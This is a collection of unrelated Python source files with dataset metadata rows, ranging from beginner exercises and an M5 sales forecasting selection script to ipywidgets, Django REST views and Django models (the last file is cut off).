| 32.230769 | 99 | 0.616945 | 117 | 838 | 4.239316 | 0.444444 | 0.100806 | 0.078629 | 0.056452 | 0.092742 | 0.092742 | 0 | 0 | 0 | 0 | 0 | 0.019355 | 0.260143 | 838 | 25 | 100 | 33.52 | 0.780645 | 0.125298 | 0 | 0 | 1 | 0 | 0.059066 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.277778 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcf6168c1892c3343e6804e126e224dff6e56701 | 349 | py | Python | study/curso-em-video/exercises/037.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | study/curso-em-video/exercises/037.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | study/curso-em-video/exercises/037.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | x=int(input('Enter the number to convert: '))
print('Select the conversion')
print('''
[ 1 ] Binary
[ 2 ] Octal
[ 3 ] Hexadecimal
''')
y=int(input('1 - Binary 2 - Octal 3 - Hexadecimal'))
if y==1:
    print(bin(x)[2:])
elif y==2:
    print(oct(x))
elif y==3:
    print(hex(x))
else:
print('Invalid') | 17.45 | 52 | 0.558739 | 55 | 349 | 3.545455 | 0.490909 | 0.082051 | 0.123077 | 0.164103 | 0.174359 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036496 | 0.2149 | 349 | 20 | 53 | 17.45 | 0.675182 | 0 | 0 | 0.105263 | 0 | 0 | 0.405714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.315789 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcffbb8be658a956fb865be73b94931d9639eccb | 435 | py | Python | modeling/src/load_data.py | alyildiz/covid_19_xray | 4128cfa7146fd4f26ef5f53ee2f9231800c1abcb | [
"MIT"
] | null | null | null | modeling/src/load_data.py | alyildiz/covid_19_xray | 4128cfa7146fd4f26ef5f53ee2f9231800c1abcb | [
"MIT"
] | null | null | null | modeling/src/load_data.py | alyildiz/covid_19_xray | 4128cfa7146fd4f26ef5f53ee2f9231800c1abcb | [
"MIT"
] | null | null | null | from sklearn.model_selection import train_test_split
from src.utils import load_dataset
def get_data():
train_list_file, train_list_class = load_dataset(data_part="train")
test_x, test_y = load_dataset(data_part="test")
train_x, val_x, train_y, val_y = train_test_split(
train_list_file, train_list_class, stratify=train_list_class, test_size=0.3
)
return train_x, val_x, test_x, train_y, val_y, test_y
| 31.071429 | 83 | 0.76092 | 75 | 435 | 3.96 | 0.36 | 0.151515 | 0.141414 | 0.121212 | 0.255892 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0.00545 | 0.156322 | 435 | 13 | 84 | 33.461538 | 0.803815 | 0 | 0 | 0 | 0 | 0 | 0.02069 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | true | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
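`get_data` above relies on `train_test_split(..., stratify=train_list_class)` so that class proportions are preserved in both partitions. A self-contained sketch of what stratification means, without sklearn (the data and function name here are made up for illustration):

```python
import random
from collections import defaultdict

def stratified_split(files, labels, test_size=0.3, seed=0):
    # Group indices by class, then move test_size of each class to the
    # validation set, so every class keeps its proportion in both splits.
    rng = random.Random(seed)
    by_class = defaultdict(list)
    for idx, label in enumerate(labels):
        by_class[label].append(idx)
    train_idx, val_idx = [], []
    for label, indices in by_class.items():
        rng.shuffle(indices)
        n_val = round(len(indices) * test_size)
        val_idx.extend(indices[:n_val])
        train_idx.extend(indices[n_val:])
    pick = lambda idxs: ([files[i] for i in idxs], [labels[i] for i in idxs])
    return (*pick(train_idx), *pick(val_idx))

files = [f"img_{i}.png" for i in range(10)]
labels = ["covid"] * 5 + ["normal"] * 5
train_x, train_y, val_x, val_y = stratified_split(files, labels)
print(train_y.count("covid"), val_y.count("covid"))  # 3 in train, 2 in val
```

With a 30% split of 5 examples per class, each class contributes 3 items to training and 2 to validation, mirroring what `stratify=` guarantees in sklearn.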
1e0295cc93121468ac47831901ff4745a891d601 | 2,717 | py | Python | day-3-if-condition.py | roshansinghbisht/hello-python | 595418a47e66217ed8759c91cdb535e8fa88412b | [
"MIT"
] | null | null | null | day-3-if-condition.py | roshansinghbisht/hello-python | 595418a47e66217ed8759c91cdb535e8fa88412b | [
"MIT"
] | null | null | null | day-3-if-condition.py | roshansinghbisht/hello-python | 595418a47e66217ed8759c91cdb535e8fa88412b | [
"MIT"
] | null | null | null | # TASK:
# Given an integer, n, perform the following conditional actions:
# If n is odd, print Weird
# If n is even and in the inclusive range of 2 to 5, print Not Weird
# If n is even and in the inclusive range of 6 to 20, print Weird
# If n is even and greater than 20, print Not Weird
if __name__ == '__main__':
n = int(input().strip())
if n % 2 == 1:
print('Weird')
elif 2 <= n <= 5:
print('Not Weird')
elif 6 <= n <= 20:
print('Weird')
else:
print('Not Weird')
# input(): Read a string from standard input. The trailing newline is
# stripped. If you include the optional <prompt> argument, input()
# displays it as a prompt to the user before pausing to read input.
# >>> name = input('What is your name? ')
# input() always returns a string. If you want a numeric type, then
# you need to convert the string to the appropriate type with the int()
# as we did in above code.
# Frequently, a program needs to skip over some statements, execute a
# series of statements repetitively, or choose between alternate sets
# of statements to execute.
# That is where control structures come in. A control structure directs
# the order of execution of the statements in a program (referred to as
# the program’s control flow).
# In a Python program, the if statement is how we perform this sort of
# decision-making. It allows for conditional execution of a statement or
# group of statements based on the value of an expression. Syntax:
# if <expr>: #<expr> is an expression evaluated in boolean
# <statements> #these are valid Python statements, which must be indented.
# Sometimes, you want to evaluate a condition and take one path if it
# is true but specify an alternative path if it is not. This is accomplished
# with an else
# clause:
# if <expr>:
# <statement(s)>
# else:
# <statement(s)>
# If <expr> is true, the first suite is executed, and the second is skipped.
# If <expr> is false, the first suite is skipped and the second is executed.
# There is also syntax for branching execution based on several alternatives.
# For this, use one or more elif (short for else if) clauses. Python evaluates
# each <expr> in turn and executes the suite corresponding to the first that is
# true. If none of the expressions
# are true, and an else clause is specified, then its suite is executed:
# if <expr>:
# <statement(s)>
# elif <expr>:
# <statement(s)>
# elif <expr>:
# <statement(s)>
# ...
# else:
# <statement(s)>
# At most, one of the code blocks specified will be executed. If an else clause
# isn’t included, and all the conditions are false, then none of the blocks will
# be executed.
| 38.814286 | 81 | 0.694148 | 437 | 2,717 | 4.297483 | 0.386728 | 0.031949 | 0.01065 | 0.015974 | 0.103834 | 0.103834 | 0.08147 | 0.040469 | 0.040469 | 0.040469 | 0 | 0.006632 | 0.22304 | 2,717 | 69 | 82 | 39.376812 | 0.882994 | 0.868237 | 0 | 0.4 | 0 | 0 | 0.118421 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e04859ff7d5d3c3aacb33208a98e3c4d2b062d2 | 23,314 | py | Python | 5.2_CUSTOM_LIBRARY/day_by_day_best_low_error_point_forecast_between_all_models.py | pedroMoya/M5_kaggle_accuracy_KAGGLE_M5_A_share | 68126d57c44c18530782ccfe8a9df499889a47a3 | [
"MIT"
] | 2 | 2020-06-02T18:39:45.000Z | 2021-01-01T19:17:15.000Z | 5.2_CUSTOM_LIBRARY/day_by_day_best_low_error_point_forecast_between_all_models.py | pedroMoya/M5_kaggle_accuracy_KAGGLE_M5_A_share | 68126d57c44c18530782ccfe8a9df499889a47a3 | [
"MIT"
] | 1 | 2021-01-01T19:17:08.000Z | 2021-03-19T00:10:52.000Z | 5.2_CUSTOM_LIBRARY/day_by_day_best_low_error_point_forecast_between_all_models.py | pedroMoya/M5_kaggle_accuracy_KAGGLE_M5_A_share | 68126d57c44c18530782ccfe8a9df499889a47a3 | [
"MIT"
] | 1 | 2021-01-01T19:17:17.000Z | 2021-01-01T19:17:17.000Z | # analyzing each point forecast and selecting the best, day by day, saving forecasts and making final forecast
import os
import sys
import datetime
import logging
import logging.handlers as handlers
import json
import itertools as it
import pandas as pd
import numpy as np
# open local settings
with open('./settings.json') as local_json_file:
local_submodule_settings = json.loads(local_json_file.read())
local_json_file.close()
# log setup
current_script_name = os.path.basename(__file__).split('.')[0]
log_path_filename = ''.join([local_submodule_settings['log_path'], current_script_name, '.log'])
logging.basicConfig(filename=log_path_filename, level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger = logging.getLogger(__name__)
logHandler = handlers.RotatingFileHandler(log_path_filename, maxBytes=10485760, backupCount=5)
logger.addHandler(logHandler)
# load custom libraries
sys.path.insert(1, local_submodule_settings['custom_library_path'])
from save_forecast_and_make_submission import save_forecast_and_submission
from stochastic_model_obtain_results import stochastic_simulation_results_analysis
class explore_day_by_day_results_and_generate_submission:
def run(self, submission_name, local_ergs_settings):
try:
print('\nstarting the granular day_by_day ts_by_ts point forecast selection approach')
# first check the stage, if evaluation stage, this means that no MSE are available, warning about this
if local_ergs_settings['competition_stage'] != 'submitting_after_June_1th_using_1913days':
print('settings indicate that the final stage is now in progress')
print('so there not available real MSE for comparison')
print('the last saved data will be used and allow to continue..')
print(''.join(['\x1b[0;2;41m',
'but be careful with this submission and consider other way to make the final submit',
'\x1b[0m']))
# loading the forecasts
first_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'first_model_forecast_data.npy']))
second_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'second_model_forecast_data.npy']))
third_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'third_model_forecast_data.npy']))
fourth_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'fourth_model_forecast_data.npy']))
# this forecast has the shape=30490, 28
fifth_model_forecast_30490_28 = np.load(''.join([local_ergs_settings['train_data_path'],
'fifth_model_forecast_data.npy']))
fifth_model_forecast = np.zeros(shape=(60980, 28), dtype=np.dtype('float32'))
fifth_model_forecast[0: 30490, :] = fifth_model_forecast_30490_28
sixth_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'sixth_model_forecast_data.npy']))
seventh_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'seventh_model_forecast_data.npy']))
eighth_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'eighth_model_nearest_neighbor_forecast_data.npy']))
ninth_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'ninth_model_random_average_simulation_forecast_data.npy']))
best_mse_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'mse_based_best_ts_forecast.npy']))
# day by day comparison
with open(''.join([local_ergs_settings['hyperparameters_path'],
'organic_in_block_time_serie_based_model_hyperparameters.json'])) \
as local_r_json_file:
local_model_ergs_hyperparameters = json.loads(local_r_json_file.read())
local_r_json_file.close()
nof_ts = local_ergs_settings['number_of_time_series']
local_forecast_horizon_days = local_ergs_settings['forecast_horizon_days']
best_lower_error_ts_day_by_day_y_pred = np.zeros(shape=(nof_ts, local_forecast_horizon_days),
dtype=np.dtype('float32'))
count_best_first_model, count_best_second_model, count_best_third_model, count_best_fourth_model,\
count_best_fifth_model, count_best_sixth_model, count_best_seventh_model, count_best_eighth_model,\
count_best_ninth_model, count_best_mse_model = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
ts_model_mse = []
# accessing ground_truth data and rechecking stage of competition
local_ergs_raw_data_filename = 'sales_train_evaluation.csv'
local_ergs_raw_unit_sales = pd.read_csv(''.join([local_ergs_settings['raw_data_path'],
local_ergs_raw_data_filename]))
print('raw sales data accessed (day_by_day_approach_best_lower_error_model results evaluation)')
# extract data and check dimensions
local_ergs_raw_unit_sales = local_ergs_raw_unit_sales.iloc[:, 6:].values
local_max_selling_time = np.shape(local_ergs_raw_unit_sales)[1]
local_settings_max_selling_time = local_ergs_settings['max_selling_time']
if local_settings_max_selling_time + 28 <= local_max_selling_time:
local_ergs_raw_unit_sales_ground_truth = local_ergs_raw_unit_sales
print('ground_truth data obtained')
print('length raw data ground truth:', local_ergs_raw_unit_sales_ground_truth.shape[1])
local_ergs_raw_unit_sales = local_ergs_raw_unit_sales[:, :local_settings_max_selling_time]
print('length raw data for training:', local_ergs_raw_unit_sales.shape[1])
elif local_max_selling_time != local_settings_max_selling_time:
print("settings doesn't match data dimensions, it must be rechecked before continue"
"(_day_by_day_best_lower_error_model_module)")
logger.info(''.join(['\n', datetime.datetime.now().strftime("%d.%b %Y %H:%M:%S"),
' data dimensions does not match settings']))
return False
else:
if local_ergs_settings['competition_stage'] != 'submitting_after_June_1th_using_1941days':
print(''.join(['\x1b[0;2;41m', 'Warning', '\x1b[0m']))
print('please check: forecast horizon days will be included within training data')
print('It was expected that the last 28 days were not included..')
print('to avoid overfitting')
elif local_ergs_settings['competition_stage'] == 'submitting_after_June_1th_using_1941days':
print(''.join(['\x1b[0;2;41m', 'Straight end of the competition', '\x1b[0m']))
print('settings indicate that this is the last stage!')
print('caution: take in consideration that evaluations in this point are not useful, '
'because will be made using the last data (the same used in training)')
# will only use the last data available
local_ergs_raw_unit_sales_ground_truth = \
local_ergs_raw_unit_sales_ground_truth[:, -local_forecast_horizon_days:]
# very granular approach
# iterating in each point_forecast, calculating error and selecting best lower error model forecast
for time_serie_index, day_index in it.product(range(nof_ts), range(local_forecast_horizon_days)):
# acquiring day_by_day data
ground_truth_ts_day = local_ergs_raw_unit_sales_ground_truth[time_serie_index, day_index]
first_model_ts_day = first_model_forecast[time_serie_index, day_index]
second_model_ts_day = second_model_forecast[time_serie_index, day_index]
third_model_ts_day = third_model_forecast[time_serie_index, day_index]
fourth_model_ts_day = fourth_model_forecast[time_serie_index, day_index]
fifth_model_ts_day = fifth_model_forecast[time_serie_index, day_index]
sixth_model_ts_day = sixth_model_forecast[time_serie_index, day_index]
seventh_model_ts_day = seventh_model_forecast[time_serie_index, day_index]
eighth_model_ts_day = eighth_model_forecast[time_serie_index, day_index].astype(np.dtype('float32'))
ninth_model_ts_day = ninth_model_forecast[time_serie_index, day_index]
best_mse_model_ts_day = best_mse_model_forecast[time_serie_index, day_index]
# calculating error
first_model_ts_day_error = np.abs(ground_truth_ts_day - first_model_ts_day)
second_model_ts_day_error = np.abs(ground_truth_ts_day - second_model_ts_day)
third_model_ts_day_error = np.abs(ground_truth_ts_day - third_model_ts_day)
fourth_model_ts_day_error = np.abs(ground_truth_ts_day - fourth_model_ts_day)
fifth_model_ts_day_error = np.abs(ground_truth_ts_day - fifth_model_ts_day)
sixth_model_ts_day_error = np.abs(ground_truth_ts_day - sixth_model_ts_day)
seventh_model_ts_day_error = np.abs(ground_truth_ts_day - seventh_model_ts_day)
eighth_model_ts_day_error = np.abs(ground_truth_ts_day - eighth_model_ts_day)
ninth_model_ts_day_error = np.abs(ground_truth_ts_day - ninth_model_ts_day)
best_mse_model_ts_day_error = np.abs(ground_truth_ts_day - best_mse_model_ts_day)
# selecting best point ts_day forecast
if first_model_ts_day_error <= second_model_ts_day_error and \
first_model_ts_day_error <= third_model_ts_day_error \
and first_model_ts_day_error <= fourth_model_ts_day_error \
and first_model_ts_day_error <= fifth_model_ts_day_error\
and first_model_ts_day_error <= sixth_model_ts_day_error \
and first_model_ts_day_error <= seventh_model_ts_day_error\
and first_model_ts_day_error <= eighth_model_ts_day_error \
and first_model_ts_day_error <= ninth_model_ts_day_error \
and first_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = first_model_ts_day
count_best_first_model += 1
ts_model_mse.append([time_serie_index, int(1), first_model_ts_day_error])
# elif best_mse_model_ts_day_error <= first_model_ts_day_error \
# and best_mse_model_ts_day_error <= second_model_ts_day_error \
# and best_mse_model_ts_day_error <= third_model_ts_day_error \
# and best_mse_model_ts_day_error <= fourth_model_ts_day_error\
# and best_mse_model_ts_day_error <= fifth_model_ts_day_error \
# and best_mse_model_ts_day_error <= sixth_model_ts_day_error\
# and best_mse_model_ts_day_error <= seventh_model_ts_day_error \
# and best_mse_model_ts_day_error <= eighth_model_ts_day_error\
# and best_mse_model_ts_day_error <= ninth_model_ts_day_error:
# best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = best_mse_model_ts_day
# count_best_mse_model += 1
# ts_model_mse.append([time_serie_index, int(10), best_mse_model_ts_day_error])
elif second_model_ts_day_error <= first_model_ts_day_error \
and second_model_ts_day_error <= third_model_ts_day_error \
and second_model_ts_day_error <= fourth_model_ts_day_error \
and second_model_ts_day_error <= fifth_model_ts_day_error\
and second_model_ts_day_error <= sixth_model_ts_day_error \
and second_model_ts_day_error <= seventh_model_ts_day_error\
and second_model_ts_day_error <= eighth_model_ts_day_error \
and second_model_ts_day_error <= ninth_model_ts_day_error\
and second_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = second_model_ts_day
count_best_second_model += 1
ts_model_mse.append([time_serie_index, int(2), second_model_ts_day_error])
elif third_model_ts_day_error <= first_model_ts_day_error \
and third_model_ts_day_error <= second_model_ts_day_error \
and third_model_ts_day_error <= fourth_model_ts_day_error \
and third_model_ts_day_error <= fifth_model_ts_day_error\
and third_model_ts_day_error <= sixth_model_ts_day_error \
and third_model_ts_day_error <= seventh_model_ts_day_error\
and third_model_ts_day_error <= eighth_model_ts_day_error \
and third_model_ts_day_error <= ninth_model_ts_day_error\
and third_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = third_model_ts_day
count_best_third_model += 1
ts_model_mse.append([time_serie_index, int(3), third_model_ts_day_error])
# elif fourth_model_ts_day_error <= first_model_ts_day_error \
# and fourth_model_ts_day_error <= second_model_ts_day_error \
# and fourth_model_ts_day_error <= third_model_ts_day_error \
# and fourth_model_ts_day_error <= fifth_model_ts_day_error\
# and fourth_model_ts_day_error <= sixth_model_ts_day_error \
# and fourth_model_ts_day_error <= seventh_model_ts_day_error\
# and fourth_model_ts_day_error <= eighth_model_ts_day_error \
# and fourth_model_ts_day_error <= ninth_model_ts_day_error\
# and fourth_model_ts_day_error <= best_mse_model_ts_day_error:
# best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = fourth_model_ts_day
# count_best_fourth_model += 1
# ts_model_mse.append([time_serie_index, int(4), fourth_model_ts_day_error])
elif fifth_model_ts_day_error <= first_model_ts_day_error \
and fifth_model_ts_day_error <= second_model_ts_day_error \
and fifth_model_ts_day_error <= third_model_ts_day_error \
and fifth_model_ts_day_error <= fourth_model_ts_day_error\
and fifth_model_ts_day_error <= sixth_model_ts_day_error \
and fifth_model_ts_day_error <= seventh_model_ts_day_error\
and fifth_model_ts_day_error <= eighth_model_ts_day_error \
and fifth_model_ts_day_error <= ninth_model_ts_day_error\
and fifth_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = fifth_model_ts_day
count_best_fifth_model += 1
ts_model_mse.append([time_serie_index, int(5), fifth_model_ts_day_error])
elif sixth_model_ts_day_error <= first_model_ts_day_error \
and sixth_model_ts_day_error <= second_model_ts_day_error \
and sixth_model_ts_day_error <= third_model_ts_day_error \
and sixth_model_ts_day_error <= fourth_model_ts_day_error\
and sixth_model_ts_day_error <= fifth_model_ts_day_error \
and sixth_model_ts_day_error <= seventh_model_ts_day_error\
and sixth_model_ts_day_error <= eighth_model_ts_day_error \
and sixth_model_ts_day_error <= ninth_model_ts_day_error\
and sixth_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = sixth_model_ts_day
count_best_sixth_model += 1
ts_model_mse.append([time_serie_index, int(6), sixth_model_ts_day_error])
elif seventh_model_ts_day_error <= first_model_ts_day_error \
and seventh_model_ts_day_error <= second_model_ts_day_error \
and seventh_model_ts_day_error <= third_model_ts_day_error \
and seventh_model_ts_day_error <= fourth_model_ts_day_error\
and seventh_model_ts_day_error <= fifth_model_ts_day_error \
and seventh_model_ts_day_error <= sixth_model_ts_day_error\
and seventh_model_ts_day_error <= eighth_model_ts_day_error \
and seventh_model_ts_day_error <= ninth_model_ts_day_error\
and seventh_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = seventh_model_ts_day
count_best_seventh_model += 1
ts_model_mse.append([time_serie_index, int(7), seventh_model_ts_day_error])
elif ninth_model_ts_day_error <= first_model_ts_day_error \
and ninth_model_ts_day_error <= second_model_ts_day_error \
and ninth_model_ts_day_error <= third_model_ts_day_error \
and ninth_model_ts_day_error <= fourth_model_ts_day_error\
and ninth_model_ts_day_error <= fifth_model_ts_day_error \
and ninth_model_ts_day_error <= sixth_model_ts_day_error\
and ninth_model_ts_day_error <= seventh_model_ts_day_error \
and ninth_model_ts_day_error <= eighth_model_ts_day_error\
and ninth_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = ninth_model_ts_day
count_best_ninth_model += 1
ts_model_mse.append([time_serie_index, int(9), ninth_model_ts_day_error])
else:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = eighth_model_ts_day
count_best_eighth_model += 1
ts_model_mse.append([time_serie_index, int(8), eighth_model_ts_day_error])
# finally reporting the results
            print(count_best_first_model, 'ts day_by_day forecasts were taken from the first model')
            print(count_best_second_model, 'ts day_by_day forecasts were taken from the second model')
            print(count_best_third_model, 'ts day_by_day forecasts were taken from the third model')
            print(count_best_fourth_model, 'ts day_by_day forecasts were taken from the fourth model')
            print(count_best_fifth_model, 'ts day_by_day forecasts were taken from the fifth model')
            print(count_best_sixth_model, 'ts day_by_day forecasts were taken from the sixth model')
            print(count_best_seventh_model, 'ts day_by_day forecasts were taken from the seventh model')
            print(count_best_eighth_model, 'ts day_by_day forecasts were taken from the eighth model')
            print(count_best_ninth_model, 'ts day_by_day forecasts were taken from the ninth model')
            print(count_best_mse_model, 'ts day_by_day forecasts were taken from the best_mse (tenth) model')
# saving best mse_based between different models forecast and submission
store_and_submit_best_model_forecast = save_forecast_and_submission()
point_error_based_best_model_save_review = \
store_and_submit_best_model_forecast.store_and_submit(submission_name, local_ergs_settings,
best_lower_error_ts_day_by_day_y_pred)
if point_error_based_best_model_save_review:
print('best low point forecast error and generate_submission data and submission done')
else:
print('error at storing best_low_point_forecast_error data and generate_submission or submission')
# evaluating the best_lower_error criteria granular_model forecast
local_ergs_forecasts_name = 'day_by_day_best_low_error_criteria_model_forecast'
zeros_as_forecast = stochastic_simulation_results_analysis()
zeros_as_forecast_review = \
zeros_as_forecast.evaluate_stochastic_simulation(local_ergs_settings,
local_model_ergs_hyperparameters,
local_ergs_raw_unit_sales,
local_ergs_raw_unit_sales_ground_truth,
local_ergs_forecasts_name)
# saving errors by time_serie and storing the estimated best model
ts_model_mse = np.array(ts_model_mse)
np.save(''.join([local_ergs_settings['models_evaluation_path'],
'best_low_point_forecast_error_ts_model_mse']), ts_model_mse)
np.savetxt(''.join([local_ergs_settings['models_evaluation_path'],
'best_low_point_forecast_error_ts_model_mse.csv']),
ts_model_mse, fmt='%10.15f', delimiter=',', newline='\n')
except Exception as submodule_error:
print('best low point forecast error and generate_submission submodule_error: ', submodule_error)
logger.info('error in best low point forecast error and generate_submission submodule')
logger.error(str(submodule_error), exc_info=True)
return False
return True
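The `fmt='%10.15f'` passed to `np.savetxt` above is a printf-style spec: a minimum field width of 10 characters and 15 digits after the decimal point. A stdlib-only check of what that spec produces (the sample values are illustrative):

```python
# '%10.15f' = right-align to at least 10 characters, 15 decimal places
formatted = "%10.15f" % 0.123456789
assert formatted == "0.123456789000000"

# values shorter than the field width are left-padded with spaces
assert ("%10.2f" % 3.5) == "      3.50"
```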

# --- python/src/widget-play/simple_widgets.py (nagi49000/ipywidgets-play, BSD-3-Clause) ---

from ipywidgets import interact
import ipywidgets as widgets
from IPython.display import display


class SimpleWidgets():
    def __init__(self):
        self._int_slider_widget = None
        self._clicked_next_widget = None
        self._button = None

    def do_stuff_on_click(self, b):
        if self._clicked_next_widget:
            self._clicked_next_widget.close()
        if self._int_slider_widget.value < 10:
            @interact
            def get_check_box():
                x = widgets.Checkbox(value=False, description='Check me')
                self._clicked_next_widget = x
                return x
        else:
            @interact
            def get_text():
                x = widgets.Dropdown(options=['alpha', 'beta', 'gamma'], value='alpha', description='Text:')
                self._clicked_next_widget = x
                return x

    def run_simple_widgets(self):
        @interact
        def get_int_slider():
            x = widgets.IntSlider(min=0, max=30, step=1, value=10)
            self._int_slider_widget = x
            return x

        self._button = widgets.Button(description="Click Me!")
        display(self._button)
        self._button.on_click(self.do_stuff_on_click)

    @property
    def last_value(self):
        if self._clicked_next_widget:
            return self._clicked_next_widget.value
        else:
            return None
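The `< 10` branch in `do_stuff_on_click` decides which follow-up widget replaces the previous one: a checkbox while the slider sits below 10, a dropdown otherwise. The dispatch can be exercised without a notebook, using hypothetical stand-in classes in place of the ipywidgets ones:

```python
class FakeCheckbox:
    value = False

class FakeDropdown:
    value = "alpha"

def next_widget(slider_value):
    # mirrors SimpleWidgets.do_stuff_on_click: checkbox below 10, dropdown otherwise
    return FakeCheckbox() if slider_value < 10 else FakeDropdown()

assert isinstance(next_widget(5), FakeCheckbox)
assert isinstance(next_widget(10), FakeDropdown)
```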

# --- article/views/product_views.py (rayenmhamdi/Kye_BackendAPI, MIT) ---

# Create your views here.
from rest_framework import generics
from rest_framework.permissions import IsAuthenticated

from article.models import Product
from article.serializers import ProductSerializer


class ProductListCreateView(generics.ListCreateAPIView):
    """Create Product"""
    permission_classes = [IsAuthenticated]
    queryset = Product.objects.order_by('-date_modified')
    serializer_class = ProductSerializer

    def perform_create(self, serializer):
        """Save the post data when creating a new product."""
        serializer.save()


class ProductDetailsView(generics.RetrieveUpdateDestroyAPIView):
    """This class handles the http GET, PUT and DELETE requests for a product."""
    permission_classes = [IsAuthenticated]
    queryset = Product.objects.all()
    serializer_class = ProductSerializer
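These generic views still need URL wiring to be reachable. A hypothetical `urls.py` sketch for this app (a configuration fragment — the `products/` prefix and route names are assumptions, not part of the source):

```python
from django.urls import path

from article.views.product_views import ProductDetailsView, ProductListCreateView

urlpatterns = [
    # list + create on the collection; retrieve/update/delete on a single item
    path("products/", ProductListCreateView.as_view(), name="product-list"),
    path("products/<int:pk>/", ProductDetailsView.as_view(), name="product-detail"),
]
```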

# --- django/pyrog/models.py (arkhn/fhir-river, Apache-2.0) ---

import uuid
from django.conf import settings
from django.db import models
from cuid import cuid


class Source(models.Model):
    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    name = models.TextField(unique=True)
    version = models.TextField(blank=True, default="")
    users = models.ManyToManyField(settings.AUTH_USER_MODEL, related_name="sources", through="SourceUser")
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return self.name


class SourceUser(models.Model):
    class Meta:
        unique_together = (("user", "source"),)

    class SourceRole(models.TextChoices):
        WRITER = "WRITER"
        READER = "READER"

    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name="user_sources", on_delete=models.CASCADE)
    source = models.ForeignKey(Source, related_name="source_users", on_delete=models.CASCADE)
    role = models.TextField(choices=SourceRole.choices, default=SourceRole.READER)


class Resource(models.Model):
    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    source = models.ForeignKey(Source, related_name="resources", on_delete=models.CASCADE)
    label = models.TextField(blank=True, default="")
    primary_key_table = models.TextField()
    primary_key_column = models.TextField()
    definition_id = models.TextField()
    definition = models.JSONField()
    logical_reference = models.UUIDField(default=uuid.uuid4, editable=False)
    primary_key_owner = models.ForeignKey("Owner", related_name="resources", on_delete=models.RESTRICT)
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)


class Credential(models.Model):
    class Dialect(models.TextChoices):
        MSSQL = "MSSQL"
        POSTGRESQL = "POSTGRES"
        ORACLE = "ORACLE"
        SQLLITE = "SQLLITE"

    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    source = models.OneToOneField(Source, on_delete=models.CASCADE)
    host = models.TextField()
    port = models.IntegerField()
    database = models.TextField()
    login = models.TextField()
    password = models.TextField()
    model = models.TextField(choices=Dialect.choices)
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)


class Attribute(models.Model):
    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
